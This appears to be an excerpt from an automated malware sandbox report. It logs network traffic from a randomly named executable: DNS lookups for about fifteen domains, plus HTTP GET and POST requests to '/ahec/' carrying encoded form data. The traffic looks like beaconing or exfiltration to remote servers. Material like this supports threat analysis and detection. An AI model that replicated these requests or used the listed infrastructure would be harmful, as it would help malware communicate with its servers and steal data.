                                                                        Dec 2, 2023 18:51:57.710661888 CET4975580192.168.2.10185.74.252.11
                                                                        Dec 2, 2023 18:51:57.710661888 CET4975580192.168.2.10185.74.252.11
                                                                        Dec 2, 2023 18:51:57.710676908 CET8049755185.74.252.11192.168.2.10
                                                                        Dec 2, 2023 18:51:57.710692883 CET8049755185.74.252.11192.168.2.10
                                                                        Dec 2, 2023 18:51:57.710735083 CET4975580192.168.2.10185.74.252.11
                                                                        Dec 2, 2023 18:51:57.710735083 CET4975580192.168.2.10185.74.252.11
                                                                        Dec 2, 2023 18:51:57.710788012 CET8049755185.74.252.11192.168.2.10
                                                                        Dec 2, 2023 18:51:57.710803032 CET8049755185.74.252.11192.168.2.10
                                                                        Dec 2, 2023 18:51:57.710818052 CET8049755185.74.252.11192.168.2.10
                                                                        Dec 2, 2023 18:51:57.710838079 CET4975580192.168.2.10185.74.252.11
                                                                        Dec 2, 2023 18:51:57.710849047 CET4975580192.168.2.10185.74.252.11
                                                                        Dec 2, 2023 18:51:57.710870028 CET8049755185.74.252.11192.168.2.10
                                                                        Dec 2, 2023 18:51:57.710913897 CET4975580192.168.2.10185.74.252.11
                                                                        Dec 2, 2023 18:51:57.710913897 CET4975580192.168.2.10185.74.252.11
                                                                        Dec 2, 2023 18:51:58.649797916 CET4975680192.168.2.10185.74.252.11
                                                                        Dec 2, 2023 18:51:58.834728956 CET8049756185.74.252.11192.168.2.10
                                                                        Dec 2, 2023 18:51:58.835001945 CET4975680192.168.2.10185.74.252.11
                                                                        Dec 2, 2023 18:51:58.835238934 CET4975680192.168.2.10185.74.252.11
                                                                        Dec 2, 2023 18:51:59.020080090 CET8049756185.74.252.11192.168.2.10
                                                                        Dec 2, 2023 18:51:59.549618006 CET8049756185.74.252.11192.168.2.10
                                                                        Dec 2, 2023 18:51:59.549637079 CET8049756185.74.252.11192.168.2.10
                                                                        Dec 2, 2023 18:51:59.549751997 CET4975680192.168.2.10185.74.252.11
                                                                        Dec 2, 2023 18:51:59.550539970 CET4975680192.168.2.10185.74.252.11
                                                                        Dec 2, 2023 18:51:59.735200882 CET8049756185.74.252.11192.168.2.10
                                                                        Dec 2, 2023 18:52:05.510016918 CET4975780192.168.2.10107.178.250.177
                                                                        Dec 2, 2023 18:52:05.609235048 CET8049757107.178.250.177192.168.2.10
                                                                        Dec 2, 2023 18:52:05.609344959 CET4975780192.168.2.10107.178.250.177
                                                                        Dec 2, 2023 18:52:05.609568119 CET4975780192.168.2.10107.178.250.177
                                                                        Dec 2, 2023 18:52:05.708595991 CET8049757107.178.250.177192.168.2.10
                                                                        Dec 2, 2023 18:52:05.896513939 CET8049757107.178.250.177192.168.2.10
                                                                        Dec 2, 2023 18:52:05.899106979 CET8049757107.178.250.177192.168.2.10
                                                                        Dec 2, 2023 18:52:05.899156094 CET4975780192.168.2.10107.178.250.177
                                                                        Dec 2, 2023 18:52:05.899174929 CET8049757107.178.250.177192.168.2.10
                                                                        Dec 2, 2023 18:52:05.899213076 CET4975780192.168.2.10107.178.250.177
                                                                        Dec 2, 2023 18:52:07.117738008 CET4975780192.168.2.10107.178.250.177
                                                                        Dec 2, 2023 18:52:08.133843899 CET4975880192.168.2.10107.178.250.177
                                                                        Dec 2, 2023 18:52:08.233236074 CET8049758107.178.250.177192.168.2.10
                                                                        Dec 2, 2023 18:52:08.233355045 CET4975880192.168.2.10107.178.250.177
                                                                        Dec 2, 2023 18:52:08.233582973 CET4975880192.168.2.10107.178.250.177
                                                                        Dec 2, 2023 18:52:08.332757950 CET8049758107.178.250.177192.168.2.10
                                                                        Dec 2, 2023 18:52:08.520580053 CET8049758107.178.250.177192.168.2.10
                                                                        Dec 2, 2023 18:52:08.520601034 CET8049758107.178.250.177192.168.2.10
                                                                        Dec 2, 2023 18:52:08.520658016 CET4975880192.168.2.10107.178.250.177
                                                                        Dec 2, 2023 18:52:09.742599964 CET4975880192.168.2.10107.178.250.177
                                                                        Dec 2, 2023 18:52:10.759640932 CET4975980192.168.2.10107.178.250.177
                                                                        Dec 2, 2023 18:52:10.858491898 CET8049759107.178.250.177192.168.2.10
                                                                        Dec 2, 2023 18:52:10.858571053 CET4975980192.168.2.10107.178.250.177
                                                                        Dec 2, 2023 18:52:10.858983994 CET4975980192.168.2.10107.178.250.177
                                                                        Dec 2, 2023 18:52:10.957894087 CET8049759107.178.250.177192.168.2.10
                                                                        Dec 2, 2023 18:52:10.957926989 CET8049759107.178.250.177192.168.2.10
                                                                        Dec 2, 2023 18:52:11.152064085 CET8049759107.178.250.177192.168.2.10
                                                                        Dec 2, 2023 18:52:11.152132988 CET8049759107.178.250.177192.168.2.10
                                                                        Dec 2, 2023 18:52:11.152369976 CET4975980192.168.2.10107.178.250.177
                                                                        Dec 2, 2023 18:52:12.367614985 CET4975980192.168.2.10107.178.250.177
                                                                        Dec 2, 2023 18:52:13.383528948 CET4976080192.168.2.10107.178.250.177
                                                                        Dec 2, 2023 18:52:13.482168913 CET8049760107.178.250.177192.168.2.10
                                                                        Dec 2, 2023 18:52:13.482419968 CET4976080192.168.2.10107.178.250.177
                                                                        Dec 2, 2023 18:52:13.483058929 CET4976080192.168.2.10107.178.250.177
                                                                        Dec 2, 2023 18:52:13.581552982 CET8049760107.178.250.177192.168.2.10
                                                                        Dec 2, 2023 18:52:13.770286083 CET8049760107.178.250.177192.168.2.10
                                                                        Dec 2, 2023 18:52:13.782613039 CET8049760107.178.250.177192.168.2.10
                                                                        Dec 2, 2023 18:52:13.782635927 CET8049760107.178.250.177192.168.2.10
                                                                        Dec 2, 2023 18:52:13.782654047 CET8049760107.178.250.177192.168.2.10
                                                                        Dec 2, 2023 18:52:13.782672882 CET8049760107.178.250.177192.168.2.10
                                                                        Dec 2, 2023 18:52:13.782689095 CET8049760107.178.250.177192.168.2.10
                                                                        Dec 2, 2023 18:52:13.782706022 CET8049760107.178.250.177192.168.2.10
                                                                        Dec 2, 2023 18:52:13.782763004 CET4976080192.168.2.10107.178.250.177
                                                                        Dec 2, 2023 18:52:13.782789946 CET4976080192.168.2.10107.178.250.177
                                                                        Dec 2, 2023 18:52:13.783102989 CET4976080192.168.2.10107.178.250.177
                                                                        Dec 2, 2023 18:52:13.882342100 CET8049760107.178.250.177192.168.2.10
                                                                        Dec 2, 2023 18:52:21.146512985 CET4976180192.168.2.1037.97.254.27
                                                                        Dec 2, 2023 18:52:21.326364994 CET804976137.97.254.27192.168.2.10
                                                                        Dec 2, 2023 18:52:21.326494932 CET4976180192.168.2.1037.97.254.27
                                                                        Dec 2, 2023 18:52:21.326864004 CET4976180192.168.2.1037.97.254.27
                                                                        Dec 2, 2023 18:52:21.507111073 CET804976137.97.254.27192.168.2.10
                                                                        Dec 2, 2023 18:52:21.507208109 CET4976180192.168.2.1037.97.254.27
                                                                        Dec 2, 2023 18:52:22.836273909 CET4976180192.168.2.1037.97.254.27
                                                                        Dec 2, 2023 18:52:25.414793968 CET4976280192.168.2.1037.97.254.27
                                                                        Dec 2, 2023 18:52:25.599265099 CET804976237.97.254.27192.168.2.10
                                                                        Dec 2, 2023 18:52:25.599541903 CET4976280192.168.2.1037.97.254.27
                                                                        Dec 2, 2023 18:52:25.600060940 CET4976280192.168.2.1037.97.254.27
                                                                        Dec 2, 2023 18:52:25.784513950 CET804976237.97.254.27192.168.2.10
                                                                        Dec 2, 2023 18:52:25.784713984 CET4976280192.168.2.1037.97.254.27

                                                                        UDP Packets

                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                        Dec 2, 2023 18:48:38.710741043 CET6324853192.168.2.101.1.1.1
                                                                        Dec 2, 2023 18:48:39.174546003 CET53632481.1.1.1192.168.2.10
                                                                        Dec 2, 2023 18:48:55.384646893 CET5692753192.168.2.101.1.1.1
                                                                        Dec 2, 2023 18:48:55.568964958 CET53569271.1.1.1192.168.2.10
                                                                        Dec 2, 2023 18:49:08.824537992 CET5641453192.168.2.101.1.1.1
                                                                        Dec 2, 2023 18:49:09.036936045 CET53564141.1.1.1192.168.2.10
                                                                        Dec 2, 2023 18:49:52.761010885 CET5489653192.168.2.101.1.1.1
                                                                        Dec 2, 2023 18:49:53.330910921 CET53548961.1.1.1192.168.2.10
                                                                        Dec 2, 2023 18:50:08.197048903 CET5094653192.168.2.101.1.1.1
                                                                        Dec 2, 2023 18:50:08.603379011 CET53509461.1.1.1192.168.2.10
                                                                        Dec 2, 2023 18:50:21.899817944 CET5353953192.168.2.101.1.1.1
                                                                        Dec 2, 2023 18:50:22.193814993 CET53535391.1.1.1192.168.2.10
                                                                        Dec 2, 2023 18:50:36.146665096 CET6199253192.168.2.101.1.1.1
                                                                        Dec 2, 2023 18:50:36.374924898 CET53619921.1.1.1192.168.2.10
                                                                        Dec 2, 2023 18:50:49.932344913 CET5871153192.168.2.101.1.1.1
                                                                        Dec 2, 2023 18:50:50.930526972 CET5871153192.168.2.101.1.1.1
                                                                        Dec 2, 2023 18:50:51.063075066 CET53587111.1.1.1192.168.2.10
                                                                        Dec 2, 2023 18:50:51.063102007 CET53587111.1.1.1192.168.2.10
                                                                        Dec 2, 2023 18:51:04.353084087 CET6539053192.168.2.101.1.1.1
                                                                        Dec 2, 2023 18:51:04.648135900 CET53653901.1.1.1192.168.2.10
                                                                        Dec 2, 2023 18:51:19.649832964 CET6118553192.168.2.101.1.1.1
                                                                        Dec 2, 2023 18:51:20.230607986 CET53611851.1.1.1192.168.2.10
                                                                        Dec 2, 2023 18:51:34.852973938 CET6033753192.168.2.101.1.1.1
                                                                        Dec 2, 2023 18:51:35.114291906 CET53603371.1.1.1192.168.2.10
                                                                        Dec 2, 2023 18:51:49.868669987 CET6430053192.168.2.101.1.1.1
                                                                        Dec 2, 2023 18:51:50.534679890 CET53643001.1.1.1192.168.2.10
                                                                        Dec 2, 2023 18:52:04.555967093 CET6338953192.168.2.101.1.1.1
                                                                        Dec 2, 2023 18:52:05.508348942 CET53633891.1.1.1192.168.2.10
                                                                        Dec 2, 2023 18:52:20.754319906 CET5948253192.168.2.101.1.1.1
                                                                        Dec 2, 2023 18:52:21.145227909 CET53594821.1.1.1192.168.2.10

                                                                        DNS Queries

                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                        Dec 2, 2023 18:48:38.710741043 CET192.168.2.101.1.1.10x67d9Standard query (0)www.alldaysslimmingstea.comA (IP address)IN (0x0001)false
                                                                        Dec 2, 2023 18:48:55.384646893 CET192.168.2.101.1.1.10x4c6fStandard query (0)www.jones4deepriver.comA (IP address)IN (0x0001)false
                                                                        Dec 2, 2023 18:49:08.824537992 CET192.168.2.101.1.1.10xf573Standard query (0)www.poria.linkA (IP address)IN (0x0001)false
                                                                        Dec 2, 2023 18:49:52.761010885 CET192.168.2.101.1.1.10x6590Standard query (0)www.makeinai.onlineA (IP address)IN (0x0001)false
                                                                        Dec 2, 2023 18:50:08.197048903 CET192.168.2.101.1.1.10x9a66Standard query (0)www.instantconvey.comA (IP address)IN (0x0001)false
                                                                        Dec 2, 2023 18:50:21.899817944 CET192.168.2.101.1.1.10x63bdStandard query (0)www.domainappraisalbot.comA (IP address)IN (0x0001)false
                                                                        Dec 2, 2023 18:50:36.146665096 CET192.168.2.101.1.1.10x55d2Standard query (0)www.nesmalt.infoA (IP address)IN (0x0001)false
                                                                        Dec 2, 2023 18:50:49.932344913 CET192.168.2.101.1.1.10xd71aStandard query (0)www.611erhm.topA (IP address)IN (0x0001)false
                                                                        Dec 2, 2023 18:50:50.930526972 CET192.168.2.101.1.1.10xd71aStandard query (0)www.611erhm.topA (IP address)IN (0x0001)false
                                                                        Dec 2, 2023 18:51:04.353084087 CET192.168.2.101.1.1.10x2264Standard query (0)www.fam-scharf.netA (IP address)IN (0x0001)false
                                                                        Dec 2, 2023 18:51:19.649832964 CET192.168.2.101.1.1.10xf296Standard query (0)www.magmadokum.comA (IP address)IN (0x0001)false
                                                                        Dec 2, 2023 18:51:34.852973938 CET192.168.2.101.1.1.10x246cStandard query (0)www.thecoloringbitch.comA (IP address)IN (0x0001)false
                                                                        Dec 2, 2023 18:51:49.868669987 CET192.168.2.101.1.1.10x5487Standard query (0)www.altralogos.comA (IP address)IN (0x0001)false
                                                                        Dec 2, 2023 18:52:04.555967093 CET192.168.2.101.1.1.10x19f3Standard query (0)www.77moea.topA (IP address)IN (0x0001)false
                                                                        Dec 2, 2023 18:52:20.754319906 CET192.168.2.101.1.1.10xf14bStandard query (0)www.wrautomotive.onlineA (IP address)IN (0x0001)false

                                                                        DNS Answers

                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                        Dec 2, 2023 18:48:39.174546003 CET1.1.1.1192.168.2.100x67d9No error (0)www.alldaysslimmingstea.comalldaysslimmingstea.comCNAME (Canonical name)IN (0x0001)false
                                                                        Dec 2, 2023 18:48:39.174546003 CET1.1.1.1192.168.2.100x67d9No error (0)alldaysslimmingstea.com162.222.226.77A (IP address)IN (0x0001)false
                                                                        Dec 2, 2023 18:48:55.568964958 CET1.1.1.1192.168.2.100x4c6fNo error (0)www.jones4deepriver.com74.208.236.181A (IP address)IN (0x0001)false
                                                                        Dec 2, 2023 18:49:09.036936045 CET1.1.1.1192.168.2.100xf573No error (0)www.poria.link172.67.184.73A (IP address)IN (0x0001)false
                                                                        Dec 2, 2023 18:49:09.036936045 CET1.1.1.1192.168.2.100xf573No error (0)www.poria.link104.21.18.253A (IP address)IN (0x0001)false
                                                                        Dec 2, 2023 18:49:53.330910921 CET1.1.1.1192.168.2.100x6590No error (0)www.makeinai.online37.140.192.89A (IP address)IN (0x0001)false
                                                                        Dec 2, 2023 18:50:08.603379011 CET1.1.1.1192.168.2.100x9a66No error (0)www.instantconvey.cominstantconvey.comCNAME (Canonical name)IN (0x0001)false
                                                                        Dec 2, 2023 18:50:08.603379011 CET1.1.1.1192.168.2.100x9a66No error (0)instantconvey.com131.153.147.90A (IP address)IN (0x0001)false
                                                                        Dec 2, 2023 18:50:22.193814993 CET1.1.1.1192.168.2.100x63bdNo error (0)www.domainappraisalbot.com94.23.162.163A (IP address)IN (0x0001)false
                                                                        Dec 2, 2023 18:50:36.374924898 CET1.1.1.1192.168.2.100x55d2No error (0)www.nesmalt.info66.29.155.54A (IP address)IN (0x0001)false
                                                                        Dec 2, 2023 18:50:51.063075066 CET1.1.1.1192.168.2.100xd71aNo error (0)www.611erhm.top34.149.198.43A (IP address)IN (0x0001)false
                                                                        Dec 2, 2023 18:50:51.063075066 CET1.1.1.1192.168.2.100xd71aNo error (0)www.611erhm.top34.117.26.57A (IP address)IN (0x0001)false
                                                                        Dec 2, 2023 18:50:51.063102007 CET1.1.1.1192.168.2.100xd71aNo error (0)www.611erhm.top34.149.198.43A (IP address)IN (0x0001)false
                                                                        Dec 2, 2023 18:50:51.063102007 CET1.1.1.1192.168.2.100xd71aNo error (0)www.611erhm.top34.117.26.57A (IP address)IN (0x0001)false
                                                                        Dec 2, 2023 18:51:04.648135900 CET1.1.1.1192.168.2.100x2264No error (0)www.fam-scharf.netfam-scharf.netCNAME (Canonical name)IN (0x0001)false
                                                                        Dec 2, 2023 18:51:04.648135900 CET1.1.1.1192.168.2.100x2264No error (0)fam-scharf.net81.169.145.70A (IP address)IN (0x0001)false
                                                                        Dec 2, 2023 18:51:20.230607986 CET1.1.1.1192.168.2.100xf296No error (0)www.magmadokum.comredirect.natrocdn.comCNAME (Canonical name)IN (0x0001)false
                                                                        Dec 2, 2023 18:51:20.230607986 CET1.1.1.1192.168.2.100xf296No error (0)redirect.natrocdn.comnatroredirect.natrocdn.comCNAME (Canonical name)IN (0x0001)false
                                                                        Dec 2, 2023 18:51:20.230607986 CET1.1.1.1192.168.2.100xf296No error (0)natroredirect.natrocdn.com85.159.66.93A (IP address)IN (0x0001)false
                                                                        Dec 2, 2023 18:51:35.114291906 CET1.1.1.1192.168.2.100x246cNo error (0)www.thecoloringbitch.comthecoloringbitch.comCNAME (Canonical name)IN (0x0001)false
                                                                        Dec 2, 2023 18:51:35.114291906 CET1.1.1.1192.168.2.100x246cNo error (0)thecoloringbitch.com162.241.252.161A (IP address)IN (0x0001)false
                                                                        Dec 2, 2023 18:51:50.534679890 CET1.1.1.1192.168.2.100x5487No error (0)www.altralogos.comaltralogos.comCNAME (Canonical name)IN (0x0001)false
                                                                        Dec 2, 2023 18:51:50.534679890 CET1.1.1.1192.168.2.100x5487No error (0)altralogos.com185.74.252.11A (IP address)IN (0x0001)false
                                                                        Dec 2, 2023 18:52:05.508348942 CET1.1.1.1192.168.2.100x19f3No error (0)www.77moea.top107.178.250.177A (IP address)IN (0x0001)false
                                                                        Dec 2, 2023 18:52:05.508348942 CET1.1.1.1192.168.2.100x19f3No error (0)www.77moea.top34.120.55.112A (IP address)IN (0x0001)false
                                                                        Dec 2, 2023 18:52:21.145227909 CET1.1.1.1192.168.2.100xf14bNo error (0)www.wrautomotive.onlinewrautomotive.onlineCNAME (Canonical name)IN (0x0001)false
                                                                        Dec 2, 2023 18:52:21.145227909 CET1.1.1.1192.168.2.100xf14bNo error (0)wrautomotive.online37.97.254.27A (IP address)IN (0x0001)false

                                                                        HTTP Request Dependency Graph

                                                                        • www.alldaysslimmingstea.com
                                                                        • www.jones4deepriver.com
                                                                        • www.poria.link
                                                                        • www.makeinai.online
                                                                        • www.instantconvey.com
                                                                        • www.domainappraisalbot.com
                                                                        • www.nesmalt.info
                                                                        • www.611erhm.top
                                                                        • www.fam-scharf.net
                                                                        • www.magmadokum.com
                                                                        • www.thecoloringbitch.com
                                                                        • www.altralogos.com
                                                                        • www.77moea.top
                                                                        • www.wrautomotive.online

                                                                        HTTP Packets

                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        0192.168.2.1049711162.222.226.77805828C:\Program Files (x86)\lYJnPbGqvAsrVBzAPcNbjhtdadsuOwdLkJkdJlTqjCthtZqXvtQtzjRONIHEsNRRIFDhSny\qNENczArVjafOgvC.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 2, 2023 18:48:39.371944904 CET521OUTGET /ahec/?Ot=0lWeLq0ljZnDSWqKPiItN+dDtGaop8tJSpt/SUCn4seLkPj1kpVBncTOO8qbY1skp8kxUg4twvHodh//BlyQvVj0G3LunRoJLQ==&6d=QlZl HTTP/1.1
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                        Accept-Language: en-US,en;q=0.9
                                                                        Host: www.alldaysslimmingstea.com
                                                                        Connection: close
                                                                        User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                        Dec 2, 2023 18:48:39.566896915 CET898INHTTP/1.1 404 Not Found
                                                                        Date: Sat, 02 Dec 2023 17:48:39 GMT
                                                                        Server: Apache
                                                                        Upgrade: h2,h2c
                                                                        Connection: Upgrade, close
                                                                        Last-Modified: Tue, 15 Mar 2022 21:16:32 GMT
                                                                        Accept-Ranges: bytes
                                                                        Content-Length: 583
                                                                        Vary: Accept-Encoding
                                                                        Content-Type: text/html
                                                                        Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 2e 6c 6f 61 64 65 72 20 7b 20 62 6f 72 64 65 72 3a 20 31 36 70 78 20 73 6f 6c 69 64 20 23 66 33 66 33 66 33 3b 20 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 36 70 78 20 73 6f 6c 69 64 20 23 33 34 39 38 64 62 3b 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 35 30 25 3b 20 77 69 64 74 68 3a 20 31 32 30 70 78 3b 20 68 65 69 67 68 74 3a 20 31 32 30 70 78 3b 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 73 70 69 6e 20 32 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 3b 20 70 6f 73 69 74 69 6f 6e 3a 20 66 69 78 65 64 3b 20 74 6f 70 3a 20 34 30 25 3b 20 6c 65 66 74 3a 20 34 30 25 3b 20 7d 0a 20 20 20 20 20 20 20 20 40 6b 65 79 66 72 61 6d 65 73 20 73 70 69 6e 20 7b 20 30 25 20 7b 20 74 72 61 6e 73 66 6f 72 6d 3a 20 72 6f 74 61 74 65 28 30 64 65 67 29 3b 20 7d 20 31 30 30 25 20 7b 20 74 72 61 6e 73 66 6f 72 6d 3a 20 72 6f 74 61 74 65 28 33 36 30 64 65 67 29 3b 20 7d 20 7d 0a 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 4a 61 76 61 73 63 72 69 70 74 22 3e 76 61 72 20 5f 73 6b 7a 5f 70 69 64 20 3d 20 22 39 50 4f 42 45 58 38 30 57 22 3b 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 4a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 63 64 6e 2e 6a 73 69 6e 69 74 2e 64 69 72 65 63 74 66 77 64 2e 63 6f 6d 2f 73 6b 2d 6a 73 70 61 72 6b 5f 69 6e 69 74 2e 70 68 70 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6c 6f 61 64 65 72 22 20 69 64 3d 22 73 6b 2d 6c 6f 61 64 65 72 22 3e 3c 2f 64 69 76 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                        Data Ascii: <html><head> <style> .loader { border: 16px solid #f3f3f3; border-top: 16px solid #3498db; border-radius: 50%; width: 120px; height: 120px; animation: spin 2s linear infinite; position: fixed; top: 40%; left: 40%; } @keyframes spin { 0% { transform: rotate(0deg); } 100% { transform: rotate(360deg); } } </style> <script language="Javascript">var _skz_pid = "9POBEX80W";</script> <script language="Javascript" src="http://cdn.jsinit.directfwd.com/sk-jspark_init.php"></script></head><body><div class="loader" id="sk-loader"></div></body></html>


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        1192.168.2.104971274.208.236.181805828C:\Program Files (x86)\lYJnPbGqvAsrVBzAPcNbjhtdadsuOwdLkJkdJlTqjCthtZqXvtQtzjRONIHEsNRRIFDhSny\qNENczArVjafOgvC.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 2, 2023 18:48:55.706455946 CET807OUTPOST /ahec/ HTTP/1.1
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                        Accept-Language: en-US,en;q=0.9
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Host: www.jones4deepriver.com
                                                                        Origin: http://www.jones4deepriver.com
                                                                        Referer: http://www.jones4deepriver.com/ahec/
                                                                        Cache-Control: no-cache
                                                                        Content-Length: 183
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Connection: close
                                                                        User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                        Data Raw: 4f 74 3d 77 6d 65 50 2b 49 44 38 61 47 58 35 78 6e 56 35 62 44 41 66 37 78 49 7a 4f 75 45 69 33 76 68 55 44 54 68 4f 64 73 2b 45 43 52 39 30 69 48 6e 4d 4a 37 56 53 61 50 61 74 71 4b 54 34 55 54 6e 36 35 71 2f 6d 67 71 6e 69 69 63 78 37 50 73 76 74 44 45 5a 65 54 44 51 7a 74 52 35 57 54 6d 6f 4b 61 6d 67 6e 52 66 53 7a 54 34 64 53 33 77 33 64 39 4f 42 67 43 51 35 57 6b 77 75 73 51 79 43 74 31 64 70 6e 63 65 52 4a 73 55 36 43 6e 68 59 78 61 57 44 34 75 45 70 63 72 6f 39 47 64 66 49 79 6a 6e 76 4f 75 78 34 73 31 48 30 6e 48 43 78 44 43 77 3d 3d
                                                                        Data Ascii: Ot=wmeP+ID8aGX5xnV5bDAf7xIzOuEi3vhUDThOds+ECR90iHnMJ7VSaPatqKT4UTn65q/mgqniicx7PsvtDEZeTDQztR5WTmoKamgnRfSzT4dS3w3d9OBgCQ5WkwusQyCt1dpnceRJsU6CnhYxaWD4uEpcro9GdfIyjnvOux4s1H0nHCxDCw==
                                                                        Dec 2, 2023 18:48:55.845355034 CET634INHTTP/1.1 404 Not Found
                                                                        Content-Type: text/html
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        Date: Sat, 02 Dec 2023 17:48:55 GMT
                                                                        Server: Apache
                                                                        Content-Encoding: gzip
                                                                        Data Raw: 31 38 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7d 51 4b 4f e3 30 10 be f7 57 cc 7a 0f 9c 1c 37 94 43 9b 26 1c b6 ad b4 48 85 45 28 88 e5 68 62 b7 b1 e4 78 82 33 21 0d bf 1e 27 e5 b1 20 b4 27 8f ed ef 31 f3 4d fa 63 fd 67 95 df 5f 6f a0 a4 ca c2 f5 ed af ed c5 0a 18 17 e2 6e b6 12 62 9d af e1 ef ef fc 72 0b 71 34 85 dc 4b d7 18 32 e8 a4 15 62 73 c5 26 ac 24 aa 13 21 ba ae 8b ba 59 84 7e 2f f2 1b 71 18 b4 e2 81 fc 5a 72 fa 87 19 29 52 ec 7c 92 8e 86 56 ba 7d c6 b4 63 70 a8 6c f2 e9 e6 9a ec 1b f9 78 b1 58 1c 55 83 06 a4 a5 96 2a 9c 90 92 21 ab 87 0a 36 de a3 87 b3 e9 19 70 b8 42 82 1d b6 4e 0d 10 f1 8e 49 2b 4d 12 0a 74 a4 1d 65 8c f4 81 c4 d0 ce 12 8a 52 fa 46 53 d6 d2 8e cf 59 08 85 6a ae 1f 5b f3 94 b1 d5 11 ce f3 be d6 83 37 7c 51 71 c8 0b 59 94 fa 33 6b 7c e2 83 95 47 3b b6 2c 5e 7b 4e 1f 50 f5 d0 50 6f 75 c6 76 01 c0 77 b2 32 b6 4f a4 37 d2 2e 8f 16 65 fc 86 28 d0 a2 4f 7e 4e e5 ec 74 5e 2c 47 7c 63 9e 75 12 16 a3 ab 23 fa 3f a3 97 f1 d8 71 fd a6 f6 c1 9f 46 f3 77 fe 3d b6 1e 1e 3c 76 8d f6 50 48 77 12 d2 33 4e 01 95 1a 14 16 6d 15 e2 0a b1 79 af 9b 1a 9d 32 6e 0f 84 e3 ef ed cd 16 7a 6c 81 42 38 0a 8c 8b c6 c0 eb 60 9a 8a 61 ce b0 ef 31 e1 f3 c9 0b 6c 60 6d 75 72 02 00 00 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: 189}QKO0Wz7C&HE(hbx3!' '1Mcg_onbrq4K2bs&$!Y~/qZr)R|V}cplxXU*!6pBNI+MteRFSYj[7|QqY3k|G;,^{NPPouvw2O7.e(O~Nt^,G|cu#?qFw=<vPHw3Nmy2nzlB8`a1l`mur0


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        2192.168.2.104971374.208.236.181805828C:\Program Files (x86)\lYJnPbGqvAsrVBzAPcNbjhtdadsuOwdLkJkdJlTqjCthtZqXvtQtzjRONIHEsNRRIFDhSny\qNENczArVjafOgvC.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 2, 2023 18:48:58.360888958 CET827OUTPOST /ahec/ HTTP/1.1
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                        Accept-Language: en-US,en;q=0.9
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Host: www.jones4deepriver.com
                                                                        Origin: http://www.jones4deepriver.com
                                                                        Referer: http://www.jones4deepriver.com/ahec/
                                                                        Cache-Control: no-cache
                                                                        Content-Length: 203
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Connection: close
                                                                        User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                        Data Raw: 4f 74 3d 77 6d 65 50 2b 49 44 38 61 47 58 35 77 48 6c 35 5a 67 6f 66 35 52 49 77 43 4f 45 69 39 50 68 51 44 54 74 4f 64 74 4c 4a 43 6e 6c 30 69 6d 58 4d 49 36 56 53 5a 50 61 74 69 71 54 68 62 7a 6e 7a 35 71 7a 55 67 6f 44 69 69 64 56 37 50 70 44 74 57 6c 5a 42 53 54 51 31 72 52 35 48 58 6d 6f 4b 61 6d 67 6e 52 66 58 6d 54 34 46 53 33 68 48 64 38 76 42 6a 50 77 35 52 6a 77 75 73 48 69 43 70 31 64 6f 79 63 63 6c 6a 73 53 2b 43 6e 68 49 78 61 44 6a 37 68 45 6f 5a 30 34 38 61 63 74 4a 4a 74 45 62 6a 69 77 55 54 75 52 5a 4e 43 58 64 51 46 4b 54 4b 58 65 48 78 36 38 4f 66 48 46 6a 2b 31 76 59 59 53 62 77 3d
                                                                        Data Ascii: Ot=wmeP+ID8aGX5wHl5Zgof5RIwCOEi9PhQDTtOdtLJCnl0imXMI6VSZPatiqThbznz5qzUgoDiidV7PpDtWlZBSTQ1rR5HXmoKamgnRfXmT4FS3hHd8vBjPw5RjwusHiCp1doyccljsS+CnhIxaDj7hEoZ048actJJtEbjiwUTuRZNCXdQFKTKXeHx68OfHFj+1vYYSbw=
